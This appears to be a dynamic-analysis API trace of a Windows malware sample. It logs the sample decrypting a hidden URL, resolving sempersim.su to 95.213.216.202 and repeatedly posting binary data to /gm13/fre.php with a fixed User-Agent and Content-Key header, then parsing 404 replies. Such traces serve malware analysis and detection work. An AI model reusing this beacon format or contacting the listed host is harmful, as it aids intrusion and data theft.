1 [0288.961] GetProcessHeap () returned 0x620000 [0288.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0288.961] GetProcessHeap () returned 0x620000 [0288.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0288.962] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0288.963] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0288.963] GetProcessHeap () returned 0x620000 [0288.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0288.963] GetProcessHeap () returned 0x620000 [0288.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0288.964] send (s=0x42c, buf=0x63a880*, len=237, flags=0) returned 237 [0288.964] send (s=0x42c, buf=0x6421e0*, len=159, flags=0) returned 159 [0288.964] GetProcessHeap () returned 0x620000 [0288.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0288.964] recv (in: s=0x42c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0290.521] GetProcessHeap () returned 0x620000 [0290.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0290.521] GetProcessHeap () returned 0x620000 [0290.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0290.521] GetProcessHeap () returned 0x620000 [0290.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0290.522] GetProcessHeap () returned 0x620000 [0290.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0290.522] closesocket (s=0x42c) returned 0 [0290.523] GetProcessHeap () returned 0x620000 [0290.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b690 | out: hHeap=0x620000) returned 1 [0290.523] GetProcessHeap () returned 0x620000 [0290.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ed0 | out: hHeap=0x620000) returned 1 [0290.523] GetProcessHeap () returned 0x620000 [0290.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0290.523] GetProcessHeap () returned 0x620000 [0290.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0290.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xca0) returned 0x42c [0290.540] Sleep (dwMilliseconds=0xea60) [0290.542] GetProcessHeap () returned 0x620000 [0290.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0290.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.543] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.552] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0290.565] GetProcessHeap () returned 0x620000 [0290.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0290.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.566] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0290.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.567] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.568] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.568] GetProcessHeap () returned 0x620000 [0290.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0290.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.570] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0290.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.571] CryptDestroyKey (hKey=0x62d710) returned 1 [0290.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.572] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0290.572] GetProcessHeap () returned 0x620000 [0290.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0290.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.584] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.585] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.586] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.587] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.587] GetProcessHeap () returned 0x620000 [0290.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0290.587] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0290.587] GetProcessHeap () returned 0x620000 [0290.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0290.588] GetProcessHeap () returned 0x620000 [0290.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0290.590] GetProcessHeap () returned 0x620000 [0290.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0290.591] GetProcessHeap () returned 0x620000 [0290.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0290.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0290.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0290.605] GetProcessHeap () returned 0x620000 [0290.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0290.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.608] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0290.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.609] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0290.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.610] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.610] GetProcessHeap () returned 0x620000 [0290.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0290.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.612] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0290.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.613] CryptDestroyKey (hKey=0x62d710) returned 1 [0290.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0290.614] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0290.614] GetProcessHeap () returned 0x620000 [0290.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0290.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.616] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0290.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.617] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0290.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0290.618] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0290.618] GetProcessHeap () returned 0x620000 [0290.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0290.618] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0290.620] GetProcessHeap () returned 0x620000 [0290.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0290.620] socket (af=2, type=1, protocol=6) returned 0x430 [0290.620] connect (s=0x430, name=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0290.674] FreeAddrInfoW (pAddrInfo=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0290.674] GetProcessHeap () returned 0x620000 [0290.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0290.674] GetProcessHeap () returned 0x620000 [0290.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0290.675] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0290.675] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0290.676] GetProcessHeap () returned 0x620000 [0290.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0290.676] GetProcessHeap () returned 0x620000 [0290.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0290.676] GetProcessHeap () returned 0x620000 [0290.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642d80 [0290.676] GetProcessHeap () returned 0x620000 [0290.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0290.677] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0290.678] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0290.678] GetProcessHeap () returned 0x620000 [0290.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0290.678] GetProcessHeap () returned 0x620000 [0290.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0290.678] send (s=0x430, buf=0x63a880*, len=237, flags=0) returned 237 [0290.681] send (s=0x430, buf=0x6421e0*, len=159, flags=0) returned 159 [0290.681] GetProcessHeap () returned 0x620000 [0290.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0290.681] recv (in: s=0x430, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0292.654] GetProcessHeap () returned 0x620000 [0292.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0292.655] GetProcessHeap () returned 0x620000 [0292.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0292.655] GetProcessHeap () returned 0x620000 [0292.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0292.655] GetProcessHeap () returned 0x620000 [0292.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0292.655] closesocket (s=0x430) returned 0 [0292.773] GetProcessHeap () returned 0x620000 [0292.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0292.774] GetProcessHeap () returned 0x620000 [0292.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0292.774] GetProcessHeap () returned 0x620000 [0292.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0292.775] GetProcessHeap () returned 0x620000 [0292.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0292.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1060) returned 0x430 [0292.777] Sleep (dwMilliseconds=0xea60) [0292.792] GetProcessHeap () returned 0x620000 [0292.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0292.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0292.794] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0292.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0292.802] CryptAcquireContextW (phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8) Thread: id = 12 os_tid = 0xcf4 Thread: id = 13 os_tid = 0xcc4 [0071.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0071.553] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:26:34 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0071.555] GetProcessHeap () returned 0x620000 [0071.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0071.555] GetProcessHeap () returned 0x620000 [0071.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0071.555] GetProcessHeap () returned 0x620000 [0071.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 Thread: id = 14 os_tid = 0x518 [0083.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0083.640] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:26:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0083.640] GetProcessHeap () returned 0x620000 [0083.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0083.640] GetProcessHeap () returned 0x620000 [0083.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0083.640] GetProcessHeap () returned 0x620000 [0083.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 Thread: id = 15 os_tid = 0x254 Thread: id = 16 os_tid = 0x4bc Thread: id = 17 os_tid = 0x10e0 [0095.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0095.910] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:26:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0095.910] GetProcessHeap () returned 0x620000 [0095.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0095.910] GetProcessHeap () returned 0x620000 [0095.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0095.910] GetProcessHeap () returned 0x620000 [0095.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 18 os_tid = 0x1184 [0096.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.609] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0096.609] GetProcessHeap () returned 0x620000 [0096.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0096.609] GetProcessHeap () returned 0x620000 [0096.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0096.609] GetProcessHeap () returned 0x620000 [0096.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 19 os_tid = 0x11d0 [0098.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.604] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0098.604] GetProcessHeap () returned 0x620000 [0098.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0098.604] GetProcessHeap () returned 0x620000 [0098.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0098.604] GetProcessHeap () returned 0x620000 [0098.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 20 os_tid = 0xffc [0100.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.628] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0100.628] GetProcessHeap () returned 0x620000 [0100.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0100.628] GetProcessHeap () returned 0x620000 [0100.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0100.628] GetProcessHeap () returned 0x620000 [0100.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 21 os_tid = 0x1168 [0102.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.280] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:05 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0102.280] GetProcessHeap () returned 0x620000 [0102.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63ebb0 [0102.280] GetProcessHeap () returned 0x620000 [0102.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ebb0 | out: hHeap=0x620000) returned 1 [0102.280] GetProcessHeap () returned 0x620000 [0102.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 22 os_tid = 0x10f8 [0104.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.250] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0104.250] GetProcessHeap () returned 0x620000 [0104.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0104.250] GetProcessHeap () returned 0x620000 [0104.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0104.250] GetProcessHeap () returned 0x620000 [0104.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 23 os_tid = 0x119c [0105.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0105.959] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0105.959] GetProcessHeap () returned 0x620000 [0105.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0105.959] GetProcessHeap () returned 0x620000 [0105.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0105.959] GetProcessHeap () returned 0x620000 [0105.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 24 os_tid = 0x1224 [0107.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.766] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:10 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0107.766] GetProcessHeap () returned 0x620000 [0107.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0107.766] GetProcessHeap () returned 0x620000 [0107.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0107.766] GetProcessHeap () returned 0x620000 [0107.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 25 os_tid = 0x11a4 [0108.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0108.653] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0108.654] GetProcessHeap () returned 0x620000 [0108.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0108.654] GetProcessHeap () returned 0x620000 [0108.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0108.654] GetProcessHeap () returned 0x620000 [0108.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 Thread: id = 26 os_tid = 0x1250 [0110.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0110.337] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:27:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") 